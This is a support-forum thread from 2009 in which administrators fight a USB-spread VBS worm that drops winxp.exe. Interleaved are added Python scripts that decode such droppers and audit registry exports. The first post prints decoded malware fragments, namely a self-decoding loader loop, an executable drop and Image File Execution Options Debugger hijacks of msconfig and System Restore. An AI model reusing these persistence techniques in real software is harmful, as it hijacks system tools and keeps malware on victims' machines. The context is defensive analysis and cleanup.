Endpoint Protection


Removal - winxp.exe, (o_o).jpg, winjpg.jpg, others? The gauntlet has been thrown down...

Migration User, Jul 30, 2009 01:35 PM

  • 1.  Removal - winxp.exe, (o_o).jpg, winjpg.jpg, others? The gauntlet has been thrown down...

    Posted Jul 30, 2009 11:11 AM

    Startup


    I'm a network administrator/technician/whatever other hats for an engineering firm. In working on a machine, I ended up getting an infection on a flash drive that got transferred onto my local workstation. The files above are part of the problem. The security threat also changes .vbs files to appear as MP3 audio files, and makes a plethora of registry changes. I have stopped most of what it's doing and countered it manually, but I'm still having issues. System Restore is still unavailable, and on reboot I have to wipe out a bunch of registry changes it's still making. I've been through Sysinternals' startup chooser, msconfig, and the Startup Control Panel 2.8 by Mike Lin. None have anything remotely suspicious turned on, and yet...

    Strangely, on boot, I see the same problem. System Restore is disabled completely regardless of its two registry entries or changing it in gpedit; file associations are messed with; my C drive gets an Autorun/Autoplay that runs wscript.exe /e:vbs C:\(o_o).jpg.

    (o_o).jpg


    memuuu="big long string of jibberish": For i = 1 To Len(memuuu) : rhoooo = rhoooo&Chr(Asc(Mid(memuuu,i,4))-4):Next:Execute(rhoooo)

    Not exactly the work of a genius; I broke his VBS code in the first hour of messing with it. Since then, however, I've been stuck in a quagmire of trying to figure out the source of a list of Windows issues. I wonder if the fools writing this stuff have a forum of annoying Windows settings to play with once you start executing code on a remote system?

    Processed (o_o).jpg

    This code generates a long piece of VBS code with registry changes and an .exe built into it (I modified the script to kick it out to me and saved it into a txt, which gave me about half of the changes he was doing/files he was generating), and then propagates out.

    ''''BIG "BINARY" THING HERE'''''
    ' shex holds the dropped executable as a hex string; hextoByte() turns it back into bytes
    bByte = hextoByte(shex)
    Set ObjTextStream = fs.Createtextfile(winpath&"\system32\winxp.exe",True)
    ObjTextStream.write bByte
    ObjTextStream.close

    ' copy the MP3 file-type icon onto .vbs files so the scripts look like audio
    resultat = reg.regread ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\mp3file\DefaultIcon\")
    reg.Regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Vbsfile\DefaultIcon\",resultat
    ' Image File Execution Options "Debugger": Windows launches this value instead of the named program,
    ' so opening System Restore (rstrui.exe) or msconfig runs the script again
    reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\winjpg.jpg" ,"REG_SZ"
    reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dwwinxp.exe\Debugger",winpath&"\system32\winxp.exe" ,"REG_SZ"
    reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSConfig.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\winjpg.jpg" ,"REG_SZ"

    ' two hex digits at a time -> one character (byte)
    Function hextoByte(sData)
        For lCounter = 1 To Len(sData) Step 2
            hextoByte = hextoByte & Chr("&h" & Mid(sData, lCounter, 2))
        Next
    End Function

    SEP's actions

    From the beginning, SEP has done almost nothing to address this threat.

    If I used a command prompt to:
    type c:\(o_o).jpg >> c:\mytemp.txt

    the file would -instantly- be deleted and Symantec Endpoint Protection 11 would throw a dialog telling me it blocked the threat. What's funny is it never once addressed the actual "(o_o).jpg" file. I had to fight it for a while to get it gone, but eventually I proved the better man, and after two reboots, still no return. None of the obviously very sketchy registry edits caused any problems, turning off System Restore never caused a prompt, and it flawlessly created %windir%\system32\winxp.exe and pushed it into various registry entries.

    In Closing

    I really need to get rid of the rest of this. Considering what we pay for all our licenses of Symantec, it seems like me spending all this time on what's mostly a relatively simple threat is... nonsensical. I need to wipe out the rest of the threat, get System Restore working, and get it to stop messing with Windows Update.

    I'm running Symantec Endpoint 11, definition file version 110729bd.

    Any help would be appreciated. I can provide an unmodified version of the file in question, but be warned: they've created a nightmare for me, so if you ask for them, I take no responsibility :)
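Added example, not part of the original thread and not the poster's own script: a Python triage routine that does offline what the post above describes doing by hand. It peels the Chr(Asc(c)-4) layer of a (o_o).jpg-style first stage, recovers the hex blob that hextoByte() writes out as winxp.exe (bytes.fromhex is the exact equivalent of the Chr("&h" & pair) loop), lists the reg.RegWrite calls, and flags the Image File Execution Options\<program>\Debugger keys, which are what makes launching msconfig or rstrui run the script again. Both stages below are constructed for the example: the second stage is a 16-byte stand-in that starts with the MZ magic plus two of the IFEO writes quoted above, and the first stage is that text shifted up by 4 in the exact shape the post quotes. The variable names memuuu/rhoooo come from the post; the shift amount is read from the script rather than hard-coded, so the same routine handles a variant that uses a different constant.

```python
"""Triage a (o_o).jpg-style VBS dropper offline: undo the Chr(Asc(c)-4)
layer, pull out the hex blob hextoByte() writes to disk, and list the
registry writes, flagging Image File Execution Options Debugger hijacks."""
import re
from typing import Dict, List, Optional, Tuple

# Constructed second stage (hypothetical; not the real winjpg.jpg payload):
# a 16-byte stand-in "PE" that starts with the MZ magic, plus two of the
# IFEO Debugger writes the thread quotes.
SECOND_STAGE = r'''shex = "4d5a90000300000004000000ffff0000"
bByte = hextoByte(shex)
Set ObjTextStream = fs.Createtextfile(winpath&"\system32\winxp.exe",True)
ObjTextStream.write bByte
ObjTextStream.close
reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSConfig.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\winjpg.jpg" ,"REG_SZ"
reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dwwinxp.exe\Debugger",winpath&"\system32\winxp.exe" ,"REG_SZ"'''


def shift_text(text: str, delta: int) -> str:
    """The dropper's per-character shift: it decodes with -4, so we encode with +4."""
    return "".join(chr(ord(ch) + delta) for ch in text)


# Constructed first stage in the exact shape quoted from (o_o).jpg.
FIRST_STAGE = (
    'memuuu="' + shift_text(SECOND_STAGE, 4) + '": For i = 1 To Len(memuuu) : '
    "rhoooo = rhoooo&Chr(Asc(Mid(memuuu,i,4))-4):Next:Execute(rhoooo)"
)

# var="payload" ... Chr(Asc(Mid(var,i,n)) <sign> K): captures var, payload, sign, K.
_LAYER_RE = re.compile(
    r'(\w+)="([^"]*)".*?Chr\(Asc\(Mid\(\1,\s*\w+,\s*\d+\)\)\s*([-+])\s*(\d+)\)',
    re.DOTALL,
)
_HEX_ASSIGN_RE = re.compile(r'(\w+)\s*=\s*"([0-9A-Fa-f]+)"')
_REGWRITE_RE = re.compile(
    r'^\s*reg\.regwrite\s*"([^"]+)"\s*,\s*(.+?)(?:\s*,\s*"(REG_\w+)")?\s*$',
    re.IGNORECASE | re.MULTILINE,
)
_IFEO_RE = re.compile(r"\\Image File Execution Options\\([^\\]+)\\Debugger$", re.IGNORECASE)


def peel_shift_layer(stage: str) -> str:
    """Return the script the first stage hands to Execute()."""
    m = _LAYER_RE.search(stage)
    if not m:
        raise ValueError("no Chr(Asc(...)) shift layer found")
    _, payload, sign, k = m.groups()
    return shift_text(payload, -int(k) if sign == "-" else int(k))


def extract_dropped_pe(script: str) -> Optional[bytes]:
    """Bytes hextoByte() produces from the hex string (what gets written to winxp.exe)."""
    for name, blob in _HEX_ASSIGN_RE.findall(script):
        used = re.search(r"hextoByte\(\s*%s\s*\)" % re.escape(name), script, re.IGNORECASE)
        if used and len(blob) % 2 == 0:
            return bytes.fromhex(blob)
    return None


def extract_reg_writes(script: str) -> List[Tuple[str, str, Optional[str]]]:
    """(key, value expression, type) for every reg.RegWrite in the script."""
    return [(key, expr.strip(), typ or None) for key, expr, typ in _REGWRITE_RE.findall(script)]


def ifeo_hijacks(writes: List[Tuple[str, str, Optional[str]]]) -> List[Tuple[str, str]]:
    """(hijacked program, debugger expression): Windows launches the Debugger value
    instead of the named program, which is why msconfig/rstrui ran the script."""
    out = []
    for key, expr, _ in writes:
        m = _IFEO_RE.search(key)
        if m:
            out.append((m.group(1), expr))
    return out


def triage(first_stage: str) -> Dict[str, object]:
    script = peel_shift_layer(first_stage)
    pe = extract_dropped_pe(script)
    writes = extract_reg_writes(script)
    return {
        "decoded_script": script,
        "dropped_is_pe": pe is not None and pe[:2] == b"MZ",
        "dropped_size": len(pe) if pe else 0,
        "reg_writes": writes,
        "ifeo_hijacks": ifeo_hijacks(writes),
    }


if __name__ == "__main__":
    report = triage(FIRST_STAGE)
    print("dropped PE:", report["dropped_is_pe"], report["dropped_size"], "bytes")
    for exe, dbg in report["ifeo_hijacks"]:
        print(f"IFEO hijack: {exe} -> {dbg}")
```

On a real sample, read the (o_o).jpg text into FIRST_STAGE instead of building it; the decoded script can then be saved for a second pass, since the post notes its own dump caught only about half of the changes.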



  • 2.  RE: Removal - winxp.exe, (o_o).jpg, winjpg.jpg, others? The gauntlet has been thrown down...

    Posted Jul 30, 2009 11:32 AM
    No need to send us these files; you can send them directly to the people who create the definitions for these viruses.

    Submit the files, and in the next definitions (once they have been checked) it will get detected and deleted:

    https://submit.symantec.com/gold, /basic or /essential, depending on your support contract.


  • 3.  RE: Removal - winxp.exe, (o_o).jpg, winjpg.jpg, others? The gauntlet has been thrown down...

    Posted Jul 30, 2009 11:49 AM
    Hi,

    In addition, I understood that the virus came on a flash drive, likely via Autoplay; I suggest you disable it on all of your machines to prevent similar situations:
    http://support.microsoft.com/kb/967715
    This is an important security best practice regardless of the AV product you are using.

    Regards,




  • 4.  RE: Removal - winxp.exe, (o_o).jpg, winjpg.jpg, others? The gauntlet has been thrown down...

    Posted Jul 30, 2009 01:29 PM
    I had actually searched for that and a big part of my frustration has been not finding it. Many thanks! 


  • 5.  RE: Removal - winxp.exe, (o_o).jpg, winjpg.jpg, others? The gauntlet has been thrown down...

    Posted Jul 30, 2009 01:35 PM
    Thanks!


  • 6.  RE: Removal - winxp.exe, (o_o).jpg, winjpg.jpg, others? The gauntlet has been thrown down...

    Posted Jul 30, 2009 01:44 PM
    I know this is a fairly simple question, but you have gotten rid of the Temp files and such on this machine, haven't you? CCleaner does just that quite efficiently. And the temp folders are where I've found numerous infections propagating from.
    Just my two cents worth.


  • 7.  RE: Removal - winxp.exe, (o_o).jpg, winjpg.jpg, others? The gauntlet has been thrown down...
    Best Answer

    Posted Jul 30, 2009 03:46 PM
    If you are not able to find the file, open the autorun.inf on your flash drive; you will see the name of the actual executable.


  • 8.  RE: Removal - winxp.exe, (o_o).jpg, winjpg.jpg, others? The gauntlet has been thrown down...

    Posted Jul 31, 2009 09:40 AM
    I had the same virus spreading on quite a large number of machines, where SEP was deleting the win.exe file but it kept showing up in the risks log :)

    I've spent a fair time analyzing this, and here is what I came up with.
    Here is what happens:
    SEP identifies this risk as a Backdoor.Trojan, and deletes the win.exe/winxp.exe file from the system32 folder as an action. The problem is that this isn't enough :) There are still other files and registry keys that are creating the file again and again.

    I won't go deep into the details of how it works, but there is still no definition for it. So here is the solution I've done, which has been pretty good at blocking this threat:
    - Created an Application Control policy rule which does the following:
    blocks the wscript.exe process from being called, except from legitimate known processes;
    terminates the wscript.exe process if it tries to read/write any of those files or registry keys;

    blocks read/write attempts on the following files:
    system32/winxp.jpg - win.exe - wscript.exe - winfile.jpg

    blocks read/write attempts on the following registry keys:
    HKLM\software\microsoft\windows\currentversion\run\CFTMON
    HKLM\software\microsoft\windows\currentversion\run\riigdt

    and any registry entry including a value of:
    winxp.jpg - win.exe - wscript.exe - winfile.jpg


    Once those policies have been applied, I deployed a batch file that cleans all previously infected machines, doing the following:
    - Kills running wscript.exe processes
    - Deletes the created files winxp.jpg - win.exe - wscript.exe - winfile.jpg
    - Deletes the mentioned registry entries, as well as other ones under "windowsNT\currentversion\image file execution" which were pointing some applications to execute win.exe instead of the targeted application
    - Deletes a key named shell which is created under mountpoints, and points to win.exe/winfile.jpg to execute whenever you try to access the drive


    I know it wasn't that much work, but it has remediated the infection and prevented it from coming back :) But still there isn't a signature for it, although I uploaded it for analysis quite a few weeks ago.
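Added example, not from the thread and not the reply author's batch file: a Python audit over `reg export` output that checks for the persistence the reply above describes, namely Image File Execution Options Debugger values, Run entries (the CFTMON/riigdt style) that launch the script host or one of the dropped files, the Shell\...\command key under Explorer's MountPoints2 that fires when the drive is opened, and the System Restore policy, and then prints the matching reg delete lines for an analyst to review before running. The export text is constructed; on a real box it would come from `reg export HKLM hklm.reg /y` (and the same for HKCU), opened with encoding="utf-16" since reg.exe writes UTF-16. The drive-letter MountPoints2 subkey and the DisableSR value under HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore are my additions for illustration; the reply names neither, but DisableSR is the policy that greys out System Restore and is worth checking when it "can't be turned on". The same rules also cover the earlier post's observation that something resets registry changes on boot, since every place it could restart from is listed.

```python
"""Audit a `reg export` dump for the persistence this thread describes and
emit reg delete commands for review (not for blind execution)."""
import re
from typing import Iterator, List, NamedTuple, Optional, Tuple

# File and process names taken from the thread.
IOC_NAMES = ("winxp.exe", "win.exe", "winjpg.jpg", "winfile.jpg", "winxp.jpg", "(o_o).jpg")
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
_IOC_RE = re.compile(  # whole file names only, so "darwin.exe" does not hit "win.exe"
    "|".join(r"(?<![\w.])" + re.escape(n) + r"(?![\w.])" for n in IOC_NAMES + SCRIPT_HOSTS),
    re.IGNORECASE,
)
_IFEO_RE = re.compile(r"\\Image File Execution Options\\[^\\]+$", re.IGNORECASE)
_RUN_RE = re.compile(r"\\CurrentVersion\\Run(Once)?$", re.IGNORECASE)
_MOUNTPOINTS_RE = re.compile(r"^(.*\\MountPoints2\\[^\\]+\\Shell)\\", re.IGNORECASE)
_SR_POLICY_RE = re.compile(r"\\Windows NT\\SystemRestore$", re.IGNORECASE)
_VALUE_RE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')

# Constructed sample in reg export format (assumed MountPoints2 "C" subkey and
# assumed DisableSR policy; the IFEO and Run entries mirror the thread).
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSConfig.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\winjpg.jpg"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\winjpg.jpg"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
"CFTMON"="C:\\WINDOWS\\system32\\win.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\C\Shell\AutoRun\command]
@="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\winjpg.jpg"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore]
"DisableSR"=dword:00000001
'''


class Finding(NamedTuple):
    rule: str
    key: str
    name: str
    value: str


def _unescape(s: str) -> str:
    """reg export escapes backslash and double quote inside string values."""
    return s.replace('\\"', '"').replace("\\\\", "\\")


def parse_reg_export(text: str) -> Iterator[Tuple[str, str, str]]:
    """Yield (key, value name, value). Strings and dwords are decoded; hex:/binary
    values stay raw and their backslash-continued lines are skipped."""
    key: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = _VALUE_RE.match(line)
        if key is None or not m:
            continue
        name_tok, data = m.groups()
        name = "(default)" if name_tok == "@" else _unescape(name_tok[1:-1])
        if len(data) >= 2 and data[0] == '"' and data[-1] == '"':
            value = _unescape(data[1:-1])
        elif data.lower().startswith("dword:"):
            value = str(int(data[6:], 16))
        else:
            value = data
        yield key, name, value


def audit_reg_export(text: str) -> List[Finding]:
    """Every IFEO Debugger is reported (legitimate ones are rare and deserve a look);
    the other rules only fire when the value names the script host or a dropped file."""
    findings: List[Finding] = []
    for key, name, value in parse_reg_export(text):
        if _IFEO_RE.search(key) and name.lower() == "debugger":
            findings.append(Finding("ifeo_debugger", key, name, value))
        elif _RUN_RE.search(key) and _IOC_RE.search(value):
            findings.append(Finding("run_key_script_host", key, name, value))
        elif _MOUNTPOINTS_RE.search(key) and _IOC_RE.search(value):
            findings.append(Finding("mountpoints_shell", key, name, value))
        elif _SR_POLICY_RE.search(key) and name.lower() in ("disablesr", "disableconfig") and value == "1":
            findings.append(Finding("system_restore_policy", key, name, value))
    return findings


def remediation_commands(findings: List[Finding]) -> List[str]:
    """reg.exe lines that undo each finding; wscript.exe is killed first, as the reply did,
    or the script recreates the keys while you delete them."""
    cmds = ["taskkill /IM wscript.exe /F"]
    for f in findings:
        if f.rule == "mountpoints_shell":  # drop the whole Shell subkey under MountPoints2
            cmds.append('reg delete "%s" /f' % _MOUNTPOINTS_RE.search(f.key).group(1))
        elif f.name == "(default)":
            cmds.append('reg delete "%s" /ve /f' % f.key)
        else:
            cmds.append('reg delete "%s" /v %s /f' % (f.key, f.name))
    return cmds


if __name__ == "__main__":
    hits = audit_reg_export(SAMPLE_EXPORT)
    for f in hits:
        print(f"[{f.rule}] {f.key} :: {f.name} = {f.value}")
    print("\n".join(remediation_commands(hits)))
```

The IFEO rule is deliberately broad: a Debugger value is the documented hook for attaching a debugger at launch, so the script reports each one and leaves the judgement to the analyst rather than matching only the names from this thread.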



  • 9.  RE: Removal - winxp.exe, (o_o).jpg, winjpg.jpg, others? The gauntlet has been thrown down...

    Posted Jul 31, 2009 02:00 PM
    Thanks for the response. Unfortunately, the autorun did the wscript.exe /e:vbs c:\winjpg.jpg, which was taken care of. I also found other files it referenced. They've all been exnayed, but the problem on bootup persists. I'm going to try to find a registry change monitor service I can set to start up first on the machine and see if I can find out what process is setting the registry settings, and what all the settings are it's messing with.




  • 10.  RE: Removal - winxp.exe, (o_o).jpg, winjpg.jpg, others? The gauntlet has been thrown down...

    Posted Jul 31, 2009 02:01 PM
    Mine must be a different version of the same thing, as it's doing quite a bit more than just that, and some of the file names are mildly different. Sounds super familiar, though. I'm going to have to do some research on what you're talking about, as it could help quite a bit.

    I wish it'd get added to definitions -- I'm guessing separate definitions for each file it creates, but still.


  • 11.  RE: Removal - winxp.exe, (o_o).jpg, winjpg.jpg, others? The gauntlet has been thrown down...

    Posted Aug 01, 2009 01:27 AM
    Might be another version, because I've seen different cases: win.exe appears to be created on some machines, while on the other hand winxp.exe is there on other machines. But they use almost the same methods, and the solution worked perfectly on both.

    If you don't mind, would you please provide me some more details about the different files and behaviour of the version you're dealing with, so we can both work on it.



  • 12.  RE: Removal - winxp.exe, (o_o).jpg, winjpg.jpg, others? The gauntlet has been thrown down...

    Posted Aug 01, 2009 10:21 AM
    Have you searched for the entry in the registry editor? Try to check if the entry still exists, then delete it. Or check in Task Manager if wscript is running, then end that process; then go to Run, type msconfig, go to the Startup tab and disable all the startup items. After this, reboot your computer and check if the file still appears.


  • 13.  RE: Removal - winxp.exe, (o_o).jpg, winjpg.jpg, others? The gauntlet has been thrown down...

    Posted Aug 03, 2009 01:03 PM
    I've been cleaning up computers for years, and doing some software development, system administration, etc. So I have a pretty well-rounded skillset for dealing with this kind of stuff.  I think I outlined most of what I've done in my first post, actually. There's still something hiding, making changes on startup. 


  • 14.  RE: Removal - winxp.exe, (o_o).jpg, winjpg.jpg, others? The gauntlet has been thrown down...

    Posted Aug 03, 2009 01:08 PM
    I finally got enough of the files wiped out that it stopped recreating them, so I can't really get a lot of further details on the files created, but they were C:\(o_o).jpg, C:\windows\system32\winjpg.jpg, C:\windows\system32\winxp.exe. At first it seemed like they weren't hidden/read only, but as Symantec and I wailed on it, and it kept recreating them, that seemed to change.

    It definitely has something watching for changes, and when I make certain changes in the registry or when I changed my view preferences to show hidden files, it reset them back instantly, before I could possibly make any other changes. I had to use a script to change file attributes and delete them. I'd love to figure out what. I may mess with some more of the Sysinternals tools again and see if I can sift through registry change logs to some useful resolution.

    Full scans of SEP show nothing at all, for the startup problem, the registry change blocker. I think there's another symptom but I tried hard enough to forget the issue over the weekend, I think I succeeded :)


  • 15.  RE: Removal - winxp.exe, (o_o).jpg, winjpg.jpg, others? The gauntlet has been thrown down...

    Posted Aug 03, 2009 01:34 PM
    It may be some startup registry entry. Or have you tried disconnecting your system from the network and internet, then rebooting it, to check if it comes back again? There might be some IE plugins or Temp internet files doing this as well.


  • 16.  RE: Removal - winxp.exe, (o_o).jpg, winjpg.jpg, others? The gauntlet has been thrown down...

    Posted Jan 12, 2010 10:47 AM
    Just a quick note to the forum- the definitions currently available for SEP and SAV should be effective against a threat that matches the symptoms described in this thread. 

    If any matching current infection is encountered that is not successfully cleaned by the latest defs, please do submit samples of the files involved to Security Response!

    Thanks and Best Regards,

    Mick


  • 17.  RE: Removal - winxp.exe, (o_o).jpg, winjpg.jpg, others? The gauntlet has been thrown down...

    Posted Apr 05, 2010 11:58 AM
    This is a question for anyone that can help. The o_o.jpg virus infected the computers we use at our University reactor; unfortunately the students use the same computers to do reports and homework for classes, usually transferring files to and from the computers with their flash drives. As usual with a virus like this, not only are the operator office computers infected, several of the students' personal computers are as well. I've read over and over that you cannot access System Restore to shut it down long enough to perform a scan. My question, now knowing how to erase the file from a flash drive, is: is there any way to completely erase it from the computers that have been infected? So far, the only answers I've heard are "reformat...", "re-image and reformat"... and one guy said to "nuke the hard drive and start over" (I think that was supposed to be a nuclear pun...). Is there any way to get rid of this thing so that I don't have to reformat all of these computers?


  • 18.  RE: Removal - winxp.exe, (o_o).jpg, winjpg.jpg, others? The gauntlet has been thrown down...

    Posted Apr 05, 2010 03:35 PM
    Hi, have you scanned with any third-party software like Trend Micro HouseCall to see if that cleans up the mess?